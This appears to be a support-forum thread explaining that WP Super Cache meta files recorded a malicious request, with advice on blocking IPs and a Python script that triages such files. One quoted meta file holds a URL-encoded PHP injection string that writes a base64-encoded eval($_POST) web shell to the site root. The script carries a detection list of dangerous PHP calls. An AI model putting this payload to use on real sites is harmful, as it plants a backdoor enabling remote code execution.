Ben,
Thanks for the report. When the files are gone, that may mean the cache plugin cleared the folder they were in. I haven’t used WP Super Cache much, so I’m not sure of the details.
We have a guide for cleaning hacked sites here, which may help you find where the attackers are getting in, in order to drop those files:
How to clean a hacked website
There are also recommendations to help prevent it in the future, near the end of the page. Sometimes, if you have multiple sites on the same hosting account, there may also be a vulnerability in the other site(s), that can infect the others.
-Matt R
@ben:
Probably no need to panic. WP Super Cache creates meta files of cached pages in the /wp-content/cache/{blogs/BLOG_ADDRESS_IF_MULTISITE/}meta/ folder.
This is a sample meta file:
<?php die(); ?>{"headers":{"Content-Encoding":"Content-Encoding: gzip","Vary":"Vary: Accept-Encoding, Cookie","Expires":"Expires: Thu, 19 Nov 1981 08:52:00 GMT","Content-Type":"Content-Type: text\/html; charset=UTF-8","Cache-Control":"Cache-Control: no-store, no-cache, must-revalidate","Pragma":"Pragma: no-cache","Last-Modified":"Last-Modified: Wed, 18 May 2016 11:29:25 GMT"},"uri":"domain.tld\/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27%2Fconfigurationbak.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B",...}
There’s base64_decode in the above, but that is only because someone is making these URI requests, with the malicious query string.
The cache (and corresponding meta files) are temporary, so they are deleted when no longer needed (mostly based on your settings in WP Super Cache).
Find the IPs of the requester in WF live activity and block them (preferably permanently), and make sure to keep core, plugins and themes up to date.
Happy surfing 🙂
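A way to triage such meta files, as an added example that is not part of the original posts or of WP Super Cache: it decodes the cached "uri" field, lists the PHP calls found in the query string, and checks whether a file the request tried to write actually exists. The token list, the sample URIs, the file name dropped-sample.php and the use of "." as document root are assumptions made for the illustration.

```python
import json
import os
import re
from urllib.parse import unquote, urlsplit

PHP_GUARD = "<?php die(); ?>"  # prefix seen on the meta file quoted above
# PHP calls that should never appear in a query string (list is an assumption).
SUSPICIOUS = ("base64_decode", "file_put_contents", "eval(", "ini_set", "set_time_limit")

def triage(meta_text):
    """Decode the cached request URI and report what the request attempted."""
    body = meta_text[len(PHP_GUARD):] if meta_text.startswith(PHP_GUARD) else meta_text
    uri = json.loads(body).get("uri", "")
    query = unquote(urlsplit("//" + uri).query)
    hits = [tok for tok in SUSPICIOUS if tok in query]
    # Quoted *.php names are the files the request tried to create.
    targets = re.findall(r"['\"]/?([\w.\-/]+\.php)['\"]", query)
    return {"uri": uri, "query": query, "hits": hits, "write_targets": targets}

def dropped_files(docroot, targets):
    """Return the targets that exist under docroot, i.e. the request succeeded."""
    return [t for t in targets if os.path.isfile(os.path.join(docroot, t))]

# Constructed samples (not real traffic): one probe, one ordinary page view.
PROBE = PHP_GUARD + json.dumps({"headers": {}, "uri": (
    "example.test/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B"
    "file_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27%2F"
    "dropped-sample.php%27%2Cbase64_decode%28%27Y29uc3RydWN0ZWQ%3D%27%29%29%3B")})
BENIGN = PHP_GUARD + json.dumps({"headers": {}, "uri": "example.test/about/"})

if __name__ == "__main__":
    for name, text in (("probe", PROBE), ("benign", BENIGN)):
        report = triage(text)
        print(name, report["hits"], report["write_targets"])
        # "." stands in for the site's document root (assumption).
        print("  present on disk:", dropped_files(".", report["write_targets"]))
```

A meta file with hits only records that the request was made; a non-empty result from dropped_files is what indicates the site needs cleaning.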
Hey, thanks @n Atta Kusi Adusei – nice advice to block the IP… one note for folks, since I had forgotten this – once you block the IP in ‘Live Traffic’, you switch over to ‘Blocked IPs’ to make it permanent.